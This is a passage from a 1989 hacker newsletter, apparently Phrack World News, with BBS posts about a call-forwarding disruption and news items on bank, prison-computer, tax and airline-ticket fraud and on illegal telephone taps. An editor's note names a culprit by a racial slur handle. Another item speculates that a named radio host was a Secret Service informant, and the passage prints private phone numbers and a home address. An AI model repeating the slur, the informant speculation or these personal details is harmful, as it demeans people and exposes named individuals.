  3615. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3616.  
  3617. Numb: 90 of 98                7/3/89 at 5:03 pm
  3618. Subj: I find this interesting...
  3619. Sect: General Messages
  3620. From: The Mechanic
  3621.  
  3622. I have seen Major Havoc post several messages recently (both here [The Free
  3623. World bulletin board] and elsewhere) on the topic of telephone security.  While
  3624. it was not explicitly mentioned, it was implied that some activities discussed
  3625. might not be entirely legal.  In fact, there is a logon message encouraging
  3626. users to post as much as possible, as well as upload and download software,
  3627. including software that may be copyrighted.  Now we see a message from MHavoc
  3628. that some of us may be looking forward to "BIG Surprises."  I do not know about
  3629. you, but I'm going to think twice before I post *anything* to this system, at
  3630. least until I am assured that material on this board is not being monitored by
  3631. C&P personnel.
  3632.  
  3633. I think that if MHavoc wants this system to go anywhere, he is going to have to
  3634. *prove* to us that he is not going to be narcing on people as a result of what
  3635. they post.
  3636.  
  3637. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3638.  
  3639. Numb: 91 of 98                7/3/89 at 5:23 pm
  3640. Subj: ...
  3641. Sect: General Messages
  3642. From: Major Havoc
  3643.  
  3644. The information was not supplied by myself.  It was information that was read
  3645. to me by C&P security people.  I stood there plainly denying that I even knew
  3646. what a modem was.
  3647.  
  3648. The bottom line is that you do not have to worry about me.  You need to worry
  3649. about the information that they already have.  They merely asked me if I knew
  3650. anything about it.  Of course I did not...seriously, I don't even know.
  3651.  
  3652.                                                               -Major Havoc
  3653.  
  3654. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3655.  
  3656. Numb: 93 of 98                7/3/89 at 8:29 pm
  3657. Subj: ...
  3658. Sect: General Messages
  3659. From: Juan Valdez
  3660.  
  3661. I am sure Major Havoc cannot reveal the name of the person who did it, since he
  3662. is under investigation, it would make matters more difficult to make his name
  3663. public.  I am sure we'd all like to know maybe after everything is all done
  3664. with.  This thing about C&P cracking down scares me.  I know that I have not
  3665. done anything like what you mentioned and I am not connected to anything
  3666. directly as far as I know.  Now you are getting me paranoid.
  3667.  
  3668.                                 Mike
  3669.  
  3670. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3671.  
  3672.  
  3673. Numb: 94 of 98                7/3/89 at 9:31 pm
  3674. Subj: Hmm...
  3675. Sect: General Messages
  3676. From: Mr. Mystery
  3677.  
  3678. When it becomes possible, please post his name, and, more
  3679. importantly, the date of his court appearance.  Might be worth
  3680. watching.
  3681.  
  3682.                                                            - MR. MYSTERY
  3683.  
  3684. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3685.  
  3686. Numb: 95 of 98                7/3/89 at 11:10 pm
  3687. Subj: That
  3688. Sect: General Messages
  3689. From: The Killer
  3690.  
  3691. Is he a local or just an upset user.  What sort of stuff was the
  3692. phone company upset about?  Phreakers or people tampering with
  3693. their equipment?  That is pretty messed up.
  3694.  
  3695. So long as my ass is clean, I really hope you get the idiot.  I
  3696. am curious --Is he a phone company employee?  How did he get into
  3697. the system?
  3698.  
  3699. [Killer/USAlliance] - FW:301/486-4515
  3700.  
  3701. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3702.  
  3703. Numb: 96 of 98                7/4/89 at 2:26 am
  3704. Subj: Things.........
  3705. Sect: General Messages
  3706. From: Hellraiser
  3707.  
  3708. Would I be correct to assume that this board is completely
  3709. "private."  At any rate, I would be interested in knowing who
  3710. this person causing the disturbance is/was (drop a hint).
  3711.  
  3712.  
  3713. Numb: 97 of 98                7/4/89 at 6:33 pm
  3714. Subj: Jesus...
  3715. Sect: General Messages
  3716. From: The Disk Jockey
  3717.  
  3718. Geez... Someone learns a few LMOS commands and they seem obsessed
  3719. with doing stupid things.
  3720.  
  3721. I have absolutely no idea why people would act wary towards
  3722. Havoc, I am sure that I and anyone else who ran a board would,
  3723. given the chance, burn the person disrupting the system.  What
  3724. the hell did you think?  Havoc should just let it slide?  I think
  3725. not.  People like that (doers of such cute call forwarding
  3726. things) should be screwed.  They are the people that give you a
  3727. bad reputation.
  3728.  
  3729.                                                        -The Disk Jockey
  3730.  
  3731. I hope he gets nailed, I just find it hard to believe that he
  3732. left any information that could lead back to him, as someone who
  3733. was at least smart enough to get into an LMOS or equivalent could
  3734. have at least some common sense, but I suppose his acts dictate
  3735. otherwise.
  3736.  
  3737. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3738.  
  3739. Numb: 98 of 98                7/4/89 at 7:21 pm
  3740. Subj: Well...
  3741. Sect: General Messages
  3742. From: Microchip
  3743.  
  3744. When it was on interchat, it said Major Havoc was fed up and it
  3745. was going to do this until we all calmed down
  3746.  
  3747. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3748. For those who never found out, the perpetrator of the call
  3749. forwarding was none other than SuperNigger (who is also
  3750. responsible for crashing Black Ice).  There never was any solid
  3751. proof that could be used and any comments about him leaving a
  3752. trail to follow back to him were bluffs. -KL
  3753. _______________________________________________________________________________
  3754.  
  3755. Conman Loses Prison Phone Privileges                         September 23, 1989
  3756. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3757. About a year ago there was a plot to steal $69 million from the
  3758. First National Bank of Chicago through a fraudulent wire-transfer
  3759. scheme masterminded by a man named Armand Moore.  Using the
  3760. telephone and a computer -- the tools of his trade, Mr. Moore
  3761. planned to transfer money from the accounts of corporate
  3762. customers at First National to his account in Switzerland.
  3763.  
  3764. He needed some inside help to bring it off, and he found two
  3765. young guys in the wire transfer room at the bank who were willing
  3766. to help.  Both of the clerks were fellows in their early
  3767. twenties, who had worked for the bank a couple years each.  Both
  3768. had come from families living in a ghetto neighborhood on the
  3769. south side of Chicago; but their families had raised them to be
  3770. honest.  Both had been average high school students; neither had
  3771. any previous criminal record of any sort; both had been given a
  3772. break by an employer who treated them fairly and allowed them to
  3773. rise to positions of trust:  handling huge sums of money --about
  3774. a hundred million dollars a day -- in the wire-transfer unit at
  3775. the bank.  Both showed great promise; then Armand Moore came
  3776. along.
  3777.  
  3778. Moore wined and dined these two kids; showed them the best of
  3779. times and what it was like to have a fancy apartment in a wealthy
  3780. neighborhood instead of living with your parents in an inner-city
  3781. ghetto.  Its not that they weren't guilty --after all, they did
  3782. provide the secret passwords and phrases which bank employees say
  3783. to one another on the telephone, and they did press the buttons
  3784. which sent $69 million dollars on its way to Europe -- but they
  3785. would not have done it if Armand Moore had not been there.
  3786.  
  3787. So instead of a career at the bank, the guys exchanged it for an
  3788. indictment for bank fraud; loss of their jobs; humiliation for
  3789. themselves and their families; and the right to say "convicted of
  3790. bank fraud" on future job applications.  Naturally, they are
  3791. blacklisted in the banking and computer industries for the rest
  3792. of their lives.  One of the guys said Armand had promised to give
  3793. him money to buy his mother a new coat.
  3794.  
  3795. The job at First National was bungled as we all know, two young
  3796. guys had their lives ruined, and the court took all this into
  3797. consideration when Armand Moore was sentenced to ten years in
  3798. prison last June.  But as Paul Harvey would say, "...then there
  3799. is the rest of the story...."
  3800.  
  3801. It seems Armand Moore was no stranger to bank fraud.  He had
  3802. previously pulled a couple of smaller jobs, using a telephone and
  3803. a computer to net about a million dollars from two banks in the
  3804. Detroit area.  The FBI had not previously connected him with
  3805. those jobs.  He had this money stashed away, waiting for him when
  3806. he got released from prison, which in this latest scheme, would
  3807. be a lot sooner than the government expected.
  3808.  
  3809. Mr. Moore is the sort of fellow who could sell the proverbial
  3810. ice-box to an Eskimo... or a newspaper subscription to a blind
  3811. man... he can get anybody to do anything it seems... by flirting
  3812. with them, showering them with attention, and if necessary, just
  3813. bribing them.  Now two more lives have been ruined by Armand
  3814. Moore, and his only regret is he got caught.
  3815.  
  3816. Since his trial in June, Armand Moore has been a guest of the
  3817. government at the federal penitentiary in downtown Chicago.  As a
  3818. long term resident, he's gotten to know a lot of the folks,
  3819. including the employees of the prison.  In particular, he got to
  3820. be very good friends with Randy W. Glass, age 28, an employee of
  3821. the prison in the computer facility there.  Glass' duties include
  3822. entering data into the prison computer about the inmates, their
  3823. sentences and other data.  Oh... is the story becoming clearer
  3824. now?
  3825.  
  3826. Glass and his wife live in Harvey, IL, a middle class suburb on
  3827. the south side of Chicago.  It seems like so many other people
  3828. who meet Armand Moore, Glass enjoyed the company of this older,
  3829. very sophisticated and friendly chap.  After several meetings in
  3830. the past three months, Glass was finally seduced by Moore's
  3831. money, like everyone else who meets him.  That, plus his pleasant
  3832. manners, his smooth conversation and his assurance that nothing
  3833. could go wrong led to Glass finally agreeing to accept a $70,000
  3834. bribe in exchange for punching a few buttons on the computer to
  3835. show Armand Moore's sentence was complete; him and a couple other
  3836. inmates who were sharing the same room at the prison.  Just
  3837. change a few details, punch a few buttons -- and to be on the
  3838. safe side, do it from home with your modem and terminal, using
  3839. the Warden's password which I just happen to have and will give
  3840. to you in exchange for your cooperation.
  3841.  
  3842. $70,000 was hard to resist.  But Glass was a prudent man, and he
  3843. asked what guarantee would he have of payment once Armand Moore
  3844. was released.  After all, hadn't he promised those fellows at the
  3845. bank all sorts of things and then tried to skip town immediately
  3846. when he thought the transfer had gone through?  He would even
  3847. cheat his fellow crooks, wouldn't he?
  3848.  
  3849. Moore offered a $20,000 "down payment" to show his intentions.  A
  3850. confederate outside the prison would meet Glass' wife and give
  3851. her the money.  Then the job would be done, and following Moore's
  3852. untimely release from the joint, the rest would be paid.  The
  3853. deal was made, alleges the government, and Armand Moore used a
  3854. pay phone at the prison that day to call his stepsister and have
  3855. her arrange to meet Mrs. Glass.  The money would be exchanged;
  3856. Glass was off two days later and would make the necessary
  3857. "adjustments" from his home computer; the prison roll would
  3858. reflect this on the next morning's roster of prisoners with the
  3859. notation "Time Served/Release Today."  They would meet that
  3860. evening and exchange the rest of the money.
  3861.  
  3862. All telephones at the prison, including the public pay phones,
  3863. are subject to monitoring.  A sign on each pay phone advises that
  3864. "your call may be monitored by an employee authorized to do so."
  3865. The FBI alleges that recordings were made of Moore on the phone
  3866. telling his stepsister that she should "...work with Randy, a
  3867. person affiliated with the law..." and that she would meet Mrs.
  3868. Glass the next day.  With a court ordered tap obtained a few
  3869. minutes later, the FBI heard Stephanie Glass agree to meet
  3870. Moore's stepsister at 5:45 AM the next morning in a parking lot
  3871. in Richton Park, IL.
  3872.  
  3873. At the appointed time the next morning, the two cars met in the
  3874. parking lot, and the FBI alleges the one woman handed the other a
  3875. package containing $20,000 in cash.  The FBI videotaped the
  3876. meeting and waited until Mrs. Glass had driven away.  They
  3877. followed her home, and arrested her at that time.  Randy Glass
  3878. was arrested at the prison when he arrived for work about an hour
  3879. later.  Armand Moore was arrested in his cell at the prison once
  3880. Glass had been taken into custody.  To do it the other way around
  3881. might have caused Glass to get tipped off and run away.
  3882.  
  3883. On Thursday, September 21, 1989 Mr. & Mrs. Glass and Armand Moore
  3884. appeared before United States Magistrate Joan Lefkow for
  3885. arraignment and finding of probable cause.  Finding probable
  3886. cause, she ordered all three held without bail at the prison
  3887. until their trial.  Randy Glass is now, so to speak, on the wrong
  3888. side of the bars at the place where he used to work.  He was
  3889. suspended without pay at the time of his arrest.
  3890.  
  3891. At the hearing, Magistrate Lefkow directed some particularly acid
  3892. comments to Mr. Moore, noting that he was forbidden to ever use
  3893. the telephone again for any reason for the duration of his
  3894. confinement, and was forbidden to ever be in the vicinity of the
  3895. computer room for any reason, also for the duration.
  3896.  
  3897. She noted, "...it seems to me you continue to seek the
  3898. conspiracy's objectives by using the telephone, and convincing
  3899. others to manipulate the computer..." you stand here today and
  3900. show no remorse whatsoever except that you were caught once
  3901. again.  Your prison record notes that on two occasions, prison
  3902. staff have observed you using the telephone and "...pressing the
  3903. touchtone buttons in a peculiar way during the call..." and that
  3904. you were counseled to stop doing it.  I will tell you now sir
  3905. that you are not to use the telephone for any reason for the
  3906. remainder of your current sentence.  I find probable cause to
  3907. hold you over for trial on the charge of bribery of a government
  3908. employee.  Stay away from the phones and computers at the prison
  3909. Mr. Moore!"
  3910.  
  3911. Like Gabriel Taylor at the First National Bank, neither Randy
  3912. Glass or his wife had any prior arrest record or conviction.  In
  3913. a foolish moment of greed, spurred on by a friendly fellow who
  3914. Randy really enjoyed talking to "...because he was so smart and
  3915. well-educated..." they now get to face prison and the loss of
  3916. everything in their lives.  When all three were leaving the
  3917. courtroom Thursday, Armand Moore snickered and smiled at the
  3918. audience.  He'll find other suckers soon enough.
  3919. ______________________________________________________________________
  3920.  
  3921.                                 ==Phrack Inc.==
  3922.  
  3923.                     Volume Three, Issue 28, File #11 of 12
  3924.  
  3925.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3926.             PWN                                                 PWN
  3927.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3928.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3929.             PWN               Issue XXVIII/Part 3               PWN
  3930.             PWN                                                 PWN
  3931.             PWN                 October 7, 1989                 PWN
  3932.             PWN                                                 PWN
  3933.             PWN          Created, Written, and Edited           PWN
  3934.             PWN               by Knight Lightning               PWN
  3935.             PWN                                                 PWN
  3936.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3937.  
  3938.  
  3939. FCC Orders Radio Station To Stop Phone Pranks                   August 30, 1989
  3940. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3941. The Federal Communications Commission has slapped Chicago radio
  3942. station WLUP-AM (1000) and WLUP-FM (97.9) with a $5000 fine and
  3943. threatened to pull their license for illegally broadcasting phone
  3944. calls to "unsuspecting individuals."
  3945.  
  3946. The FCC specifically cited "willful behavior and repeated
  3947. violations of its policy that recipients of phone calls from
  3948. radio stations must be informed in advance -- and on the air at
  3949. the start of the call -- that they are being broadcast."
  3950.  
  3951. In particular, the FCC noted that morning host Jonathon
  3952. Brandmeier and mid-day host Kevin Matthews were in frequent
  3953. violation of this rule.
  3954.  
  3955. Scott G. Ginsberg, president and chief executive officer of
  3956. Evergreen Media Corporation, parent company and license holder
  3957. for WLUP confirmed that his company had paid the $5000 fine
  3958. without protest for illegally broadcasting phone calls.  He
  3959. compared this punishment to receiving a traffic ticket.
  3960.  
  3961. Both Brandmeier and Matthews enjoy harassing people on the phone,
  3962. and broadcasting the reaction of their victims over the air.  One
  3963. of the calls placed by Matthews involved him posing as a police
  3964. officer.  He called a funeral home and spoke to the widow of a
  3965. man who died the day before.  He told her that her niece and
  3966. nephew, who were scheduled to come to the funeral home later that
  3967. day to help with burial arrangements had been arrested.  The
  3968. widow was not amused.  She filed suit against WLUP and Matthews.
  3969.  
  3970. Brandmeier likes to harass celebrities by managing to find their
  3971. unlisted home phone numbers and call them at 6:30 or 7:00 AM when
  3972. his show goes on the air.  He also pulls phone scams including
  3973. sending unwanted food orders; calling employers to provide
  3974. excuses for employees who won't be at work that day, and similar.
  3975. Always broadcasting the calls on the air, of course.
  3976.  
  3977. But it was the call to the grieving widow at the funeral home
  3978. which got the FCC livid.  The Commission contacted the station
  3979. that day, and an Enforcement Officer threatened to put the
  3980. station off the air that day -- in a matter of minutes when he
  3981. could get the order signed.
  3982.  
  3983. After some discussion, WLUP was permitted to continue
  3984. broadcasting, but a memo was circulated to all employees warning
  3985. that effective immediately, any violation of the phone rules
  3986. would lead to immediate termination.
  3987.  
  3988. But despite this, less than three months later, Brandmeier pulled
  3989. another of his obnoxious phone pranks.  This time, the FCC gave
  3990. him personally a $5000 fine, and told WLUP "either keep those two
  3991. under control on the air or you'll get your license yanked."
  3992.  
  3993. Now WLUP faces more sanctions, and the probable non-renewal of
  3994. its license when it expires December 1, 1989.  Afternoon disk
  3995. jockey Steve Dahl routinely broadcasts indecent material on his
  3996. show.  Daily topics of conversation include sadism and masochism,
  3997. child molestation, sexual behavior of all sorts, and frequent
  3998. slurs of the most vicious kind against gay people.  He uses
  3999. "street language" to express himself, of course, and has used the
  4000. famous "seven words you never say on the radio" more times than
  4001. anyone remembers.
  4002.  
  4003. The victims of the phone pranks have consulted with their own
  4004. attorney as a group, and he in turn is pressing the FCC to shut
  4005. down WLUP completely.
  4006.  
  4007. Ginsberg says he does not understand why the FCC is picking on
  4008. them.  He says it must be competing radio stations that would
  4009. like to see them off the air, since they are rated number three
  4010. in the Chicago area, which certainly says a lot about Chicagoan's
  4011. taste in radio entertainment.
  4012.  
  4013. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4014. - - - - - - -
  4015.  
  4016. Long time Phrack World News readers may have noticed a familiar name in this
  4017. article:  Steve Dahl.
  4018.  
  4019. Depending on how long you have been with us, you may wish to
  4020. refer to Phrack World News Issue Five/Part One (in Phrack Inc.
  4021. Volume One, Issue Six).  There is an article entitled "Mark Tabas
  4022. and Karl Marx Busted" and it is dated May 2, 1986.  Along with
  4023. this article is a short note that explains how an informant
  4024. (possibly the son of an agent of the Secret Service or Federal
  4025. Bureau of Investigation) was believed to be using the handle of
  4026. Jack or Will Bell and had helped the authorities get Tabas and
  4027. Marx.  It was widely known that he was from the 312 NPA --
  4028. Chicago, Illinois.
  4029.  
  4030. In the following issue of Phrack Inc. we have PWN Issue VI/Part 1
  4031. and an article entitled, "Marx and Tabas:  The Full Story."  This
  4032. article further explains how Steve Dahl was busted (for unknown
  4033. crimes) in Miami, Florida by the U.S. Secret Service and then
  4034. made a deal to help them get Karl Marx and Mark Tabas.
  4035.  
  4036. So is the Steve Dahl of WLUP in Chicago the same Steve Dahl from
  4037. Chicago that helped the U.S. Secret Service nail Mark Tabas and
  4038. Karl Marx?
  4039. _______________________________________________________________________________
  4040.  
  4041. Reach Out And Tap Someone Revisited                               July 30, 1989
  4042. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4043. In Phrack World News Issue XXVI/Part 2 there was an article about
  4044. two former employees of Cincinnati Bell (Leonard Gates and Robert
  4045. Draise) who claimed they had had engaged in numerous illegal taps
  4046. over a 12 year period at the request of their supervisors at
  4047. Cincinnati Bell and the Cincinnati Police Department.
  4048.  
  4049. Cincinnati Bell filed suit against the two men, Leonard Gates and
  4050. Robert
  4051. Draise, claiming both were liars out to get even with the company
  4052. after they had been fired for other reasons.
  4053.  
  4054. "'Taint necessarily so," said a judge who agreed the charges may
  4055. have some merit, and permitted the class action suit against
  4056. Cincinnati Bell to continue this past week.
  4057.  
  4058. The class action suit claims that Cincinnati Bell routinely
  4059. invaded the privacy of thousands of people in the area by
  4060. secretly tapping their phones at the request of police or FBI
  4061. officials over a twelve year period from 1972 - 1984.  The taps
  4062. were mainly applied against political dissidents during the
  4063. Vietnam era, and in more recent years, against persons under
  4064. investigation by the United States Attorney in southern Ohio,
  4065. without the permission of a court.
  4066.  
  4067. Now says the court, depending on the outcome of the class action
  4068. suit, the criminal trials of everyone in the past decade in
  4069. southern Ohio may have to be re-examined in light of illegal
  4070. evidence gained by the United States Attorney, via the FBI, as a
  4071. result of the complicity of Cincinnati Bell with that agency,
  4072. courtesy of Robert Draise and Leonard Gates.
  4073.  
  4074. The testimony this past week got *very messy* at times.  Gates
  4075. and Draise seem determined to tell every dirty thing they know
  4076. about Cincinnati Bell's security department from the dozen years
  4077. they worked there.  More details as the trial continues.
  4078. _______________________________________________________________________________
  4079.  
  4080. The Grim Phreaker Cleared In Phone Scam                           June 30, 1989
  4081. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4082. by Suzanne Getman (Syracuse Herald Journal)
  4083.  
  4084.             "We disposed of this on the basis of his
  4085. cooperation."
  4086.  
  4087. A college student who talked his way into being arrested in April
  4088. (by speaking with a chat operator) was cleared of charges against
  4089. him this week.  Kevin C.  Ashford aka The Grim Phreaker, age 22,
  4090. was arrested by sheriff's deputies on April 21 a mere five
  4091. minutes after using a payphone to speak with an operator on the
  4092. Onadaga Community College campus and charged with theft of
  4093. services, a misdemeanor.
  4094.  
  4095. Ashford admitted placing about 30 calls to a party lines known as
  4096. bridges by using phony credit card numbers and extenders.  "We
  4097. disposed of this on the basis of his cooperation, our problem
  4098. with proof, and his completion of 30 hours of community service,"
  4099. Assistant District Attorney Timothy Keough said.  Ashford had
  4100. cooperated by assisting and providing information to the
  4101. Sheriff's Department, the Federal Bureau of Investigation, and
  4102. the Secret Service for more than three weeks.  There was no
  4103. problem with proof however because Ashford admitted he was guilty
  4104. of all of the crimes.
  4105.  
  4106. Ashford was arrested in Onadaga Community College campus' Gordon
  4107. Student Center on April 21, minutes after he placed a call to a
  4108. nationwide party line called Systems 800 International (who
  4109. offered to drop charges if they could receive copies of Phrack
  4110. Inc. Newsletter from him and if he would work for them trapping
  4111. others).  Company officials said there is no way to establish the
  4112. cost of the fraudulent calls.  "Without a dollar amount, we
  4113. didn't have proof.  Without proof, we couldn't prosecute," Keough
  4114. said.
  4115.  
  4116.                          Article Submitted by DarkMage
  4117. _______________________________________________________________________________
  4118.  
  4119. Phony IRS Refunds By Computer                                   August 17, 1989
  4120. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4121. By John King (Boston Globe)
  4122.  
  4123.         "Computer Filer Got $325,000 In Phony Refunds, IRS
  4124. claims."
  4125.  
  4126. Clever tax preparers are one thing, but a clever bookkeeper who
  4127. allegedly pried 325,000 dollars from the Internal Revenue Service
  4128. found himself on the wrong side of the law yesterday, August 16.
  4129.  
  4130. In what may be the nation's first charge of electronic tax fraud,
  4131. IRS special agents yesterday arrested Alan N. Scott of West
  4132. Roxbury [a suburb of Boston], saying he claimed 45 fraudulent
  4133. income tax refunds for amounts ranging from
  4134. 3,000 dollars to 23,000 dollars.
  4135.  
  4136. The IRS charges that Scott, age 37, used the service's new
  4137. electronic filing system -- open only to tax preparers -- to
  4138. submit phony claims with assumed names and Social Security
  4139. numbers.  In some cases, the names used were of people in prison,
  4140. according to Chief Kenneth Claunch, IRS Criminal Investigation
  4141. Division.
  4142.  
  4143. "The computer age has spawned a new breed of criminal," Claunch
  4144. said in a statement.
  4145.  
  4146. New in tools, perhaps.  As for the basic idea -- filing a false
  4147. return in order to snare an unwarranted refund -- that's old hat,
  4148. admitted IRS spokeswoman Marti Melecio.
  4149.  
  4150. "I can't say that it's a new trick.  We've had fraud cases with
  4151. paper returns," Melecio said.  "The time frame is different,
  4152. though.  With electronic filings, the returns come back in two or
  4153. three weeks."
  4154.  
  4155. According to the IRS, Scott received electronic filing status on
  4156. January 31.  He did this by using a false Social Security number,
  4157. and making false statements on his application.  However, the IRS
  4158. also says Scott electronically filed 10 returns where he used his
  4159. own name as a preparer, and these returns appear to be
  4160. legitimate.
  4161.  
  4162. The scheme was uncovered by a "questionable refund detection
  4163. team," at the IRS service center in Andover, Massachusetts.
  4164. Also, the IRS credited a tip from an unnamed Boston bank "which
  4165. reported a suspicious electronic transfer of funds to an
  4166. individual," presumably Scott.
  4167.  
  4168. If convicted, Scott faces a possible prison sentence and up to
  4169. 250,000 dollars in fines on each of the counts of fraud.
  4170. _______________________________________________________________________________
  4171.  
  4172. Paris Computer Takes Law Into Its Own Hands                   September 6, 1989
  4173. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4174. >From The Guardian
  4175.  
  4176. A crusading computer has taken the law into its own hands and
  4177. caught 41,000 Parisians on charges of murder, extortion,
  4178. prostitution, drug trafficking and other serious crimes.  But the
  4179. big round-up ended in embarrassment after an admission by the
  4180. City Hall yesterday that the electronic "Batman" could not
  4181. tell the difference between a parking offense and gang warfare.
  4182. "The accused persons will be receiving letters of apology," an
  4183. official at the City Hall Treasury department said. "Instead of
  4184. receiving summons on criminal charges, they should have been sent
  4185. reminders of unpaid motoring fines in April.  Somehow the
  4186. standard codes we use for automatically issued reminders got
  4187. mixed up."
  4188.  
  4189. The first hint of the avenging computer's self-appointed mission
  4190. to clean up the capital came at the weekend.  Hundreds of
  4191. Parisians received printed letters accusing them of big crimes,
  4192. but demanding only petty fines for the major crimes of between
  4193. $50 and $150 (pounds - UK equivalent).  "About 41,000 people are
  4194. involved and some of the charges are quite weird," the official
  4195. admitted.  "One man has complained of being accused of dealing in
  4196. illegal veterinary products.  Unfortunately, other accusations
  4197. went much further, like man-slaughter through the administration
  4198. of dangerous drugs."  "There were a lot of cases of living off
  4199. immoral earnings, racketeering and murder."  The official said an
  4200. inquiry had been started to see if the caped computer had a human
  4201. accomplice.  So far, no one has asked the Joker if he was in
  4202. Paris last week.
  4203. _______________________________________________________________________________
  4204.  
  4205. Chalisti Magazine by the Chaos Computer Club
  4206. August 20, 1989
  4207. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4208. In the future, there will be an electronic magazine, published
  4209. by, and concerning the Chaos Computer Club.  It is called
  4210. Chalisti and the name is derived from "Kalisti," the Goddess of
  4211. Chaos and will, hopefully, stand for creative Chaos and not for
  4212. chaotic, but, as always only time will tell.
  4213.  
  4214. The idea is like this...
  4215.  
  4216. Over the different data networks, masses of information flow.  On
  4217. the Usenet it is about 100 MB/Month, on the CREN (Bitnet + CSNet)
  4218. the flow is about the same size.  On top of these flows, there is
  4219. the information from national networks like Zerberus, BTX and
  4220. Geonet.  Mostly, a person only gets information from one network
  4221. and that is why interesting information on data protection, data
  4222. security, alternative uses of computers, environment, university
  4223. etc. are being broadcast over only one network.
  4224.  
  4225. Information from the networks for the networks, but that is not
  4226. all.  There should emerge a list of editors, that is spread over
  4227. a large area, and works over the nets.  Information and and
  4228. opinions should be exchanged, but also further contacts will
  4229. emerge.
  4230.  
  4231. The first edition of Chalisti will presumably be published
  4232. mid-September.  Because of this, the list of editors is
  4233. relatively small, one will publish stuff from the newest
  4234. "Datenschleuder", the MIK-magazine and the most interesting
  4235. messages from the nets that appear in the following weeks.  But
  4236. as soon as the 2nd edition will appear, the content will be
  4237. different from the "Datenschleuder."
  4238.  
  4239. In Chalisti, copy and messages from the nets and other media
  4240. (MIK, and others) will be published as well.  Articles meant
  4241. especially for the Chalisti magazine are requested and these
  4242. articles will be published with the highest priority.
  4243.  
  4244. The magazine will be no bigger than 100 KB/Month.  In case of
  4245. doubt, articles will be kept for the forthcoming edition or for
  4246. the fall in copy in the Summer.  But it is also possible, that
  4247. too few articles are being sent in, in which case the content
  4248. will be spiced with information from DS, the nets and the
  4249. MIK-magazine.  In this way, a regular emerging of editions is
  4250. being secured.
  4251.  
  4252. The first edition is due 15th of September.  The second at the
  4253. end of October.  At that date, the holiday will be ended, and a
  4254. editorial and informal infrastructure will be built.  From then
  4255. on, there should be an edition every month.
  4256.  
  4257. The editorial part will presumably be done on EARN or CREN.  That
  4258. bears the advantage that quick reactions on recent messages will
  4259. be possible, as well as the possibility to talk it over at
  4260. Relay's or Galaxy Meetings, and in this way, an international
  4261. medium is available.  Writers of articles or editors from other
  4262. nets can be contacted, and there shouldn't be no technical
  4263. problems in getting the job done.  Especially on UUCP and
  4264. Zerberus, facilities will be created.
  4265.  
  4266. As ways of contacting the Editors, the following Networks are
  4267. available:
  4268.  
  4269.          EARN/CREN   - Distribution will be done over CHAMAS (107633@DOLUNI1).
  4270.                        There will be a board for Chalisti, as well as a CUG
  4271.                        for the board of Editors.  Contact there will be
  4272.                        151133@DOLUNI1.  Presumably, from the beginning of
  4273.                        October, the userid CHAMAINT@DOLUNI1 will be available.
  4274.  
  4275.          UUCP/Subnet - Contacting will be possible through chalist@olis,
  4276.                        ccc@mcshh and through ..!tmpmbx!DOLUNI1.bitnet!151133.
  4277.  
  4278.          UUCP/Dnet   - Contacting will be possible through simon@uniol.
  4279.                        Distribution will proceed through this id in
  4280.                        dnet.general.
  4281.  
  4282.          Zerberus    - At this moment: terra@mafia and terra@chaos-hh. From
  4283.                        mid-September on, presumably through chalist@subetha.
  4284.  
  4285.          BTXNet      - Unknown yet.
  4286.  
  4287.          GeoNet      - mbk1:chaos-team. Time will show, whether distribution
  4288.                        of the magazine will be done on GeoNet.
  4289.  
  4290. Contacting or distribution through FidoNet and MagicNet has been planned for,
  4291. but has to be built first.
  4292.  
  4293. Interested people are being asked to use these addresses.  For the absolute
  4294. uncontactable, there is a Snailmail address as well:
  4295.  
  4296. Frank Simon
  4297. 12 Kennedy Street
  4298. 2900 Oldenburg, FRG (West Germany)
  4299.  
  4300. 04411/592607 (Telephone)
  4301.  
  4302. Greets
  4303.  
  4304.      Terra
  4305. _______________________________________________________________________________
  4306.  
  4307. Computer-Based Airline Ticket Scam                              August 14, 1989
  4308. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4309. Taken from the Los Angeles Times
  4310.  
  4311. Phoenix police arrested four people as they continued to unravel
  4312. a bogus airline ticket ring that allegedly sold millions of
  4313. dollars of stolen tickets by advertising discounted fares in
  4314. national publications.  Investigators said the individuals put
  4315. together a major conspiracy by knowing how to access airline
  4316. computers to put travel itineraries in the computer system.  - -
  4317. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  4318. - - - - -
  4319. In the interests of equal access to information for all, I have
  4320. decided to include some of the supposed deep secrets of how to
  4321. access airline computers and inset travel itineraries.
  4322.  
  4323. This can be done from virtually any telephone nationwide
  4324. (including a rotary dial telephone).  This can of course also be
  4325. done from a public payphone if you should decide to make sure
  4326. your identity is anonymous.
  4327.  
  4328. It is necessary to determine the phone number for an airline's
  4329. computer.  All you have to do is call 1-800 directory assistance
  4330. (1-800-555-1212).  Ask for Ozark Airlines reservations (a no
  4331. longer existent company that was purchased by Trans World Airways
  4332. [TWA] used here only as an example).  The operators on duty will
  4333. read you a number, 800-PRE-SUFF.
  4334.  
  4335. Call this number and you will be connected with the Ozark
  4336. Airlines reservation office.  Here they will have a database
  4337. which stores all of Ozark's itineraries.  Simply state the date,
